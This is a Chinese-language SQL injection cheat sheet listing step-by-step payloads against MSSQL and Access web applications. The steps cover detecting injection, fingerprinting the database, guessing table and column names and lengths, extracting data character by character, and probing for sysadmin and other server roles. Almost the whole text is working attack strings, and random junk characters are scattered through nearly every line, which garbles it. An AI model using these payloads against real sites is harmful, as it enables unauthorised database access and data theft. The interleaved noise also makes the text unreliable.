1.判断是否有注入;and 1=1 ;and 1=2 n-OL0$Xu
2.初步判断是否是mssql ;and user>0 as_PoCoss
5 u0HI
3.注入参数是字符'and [查询条件] and ''=' !Rt>xD
;({W#Wa
4.搜索时没过滤参数的'and [查询条件] and '%25'=' tRfo$4#NY
1!gbTeVlY
5.判断数据库系统 SZ$Kz n
*WT`o>
;and (select count(*) from sysobjects)>0 mssql >dG[G>
N.{D$"
;and (select count(*) from msysobjects)>0 access 6MkP |vr6
w+{LAS
\'bzt"f$j
O0y_Lm\
6.猜数据库 ;and (select Count(*) from [数据库名])>0 veh<R]U
0K2`-mL
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 C2Tyoza
IN G@B#Cl
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 >e"#'K0?\
n.G!43@*N
9.(1)猜字段的ascii值(access) DDH:)=;z
VM,]X.
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 !GGkdg*-*9
U`m54f@U
(2)猜字段的ascii值(mssql) {Dmjm{
C73kJa
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 :4%k9BGAj"
7Rt9od<
)!
10.测试权限结构(mssql) >oe]$r
^a1^\X.~
^ovR7+V
H'hpEwG
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- zI<<Q2
8pgEix/M5o
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- y;H-m>*%
iW /}#
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ox (%5c)b|
&IB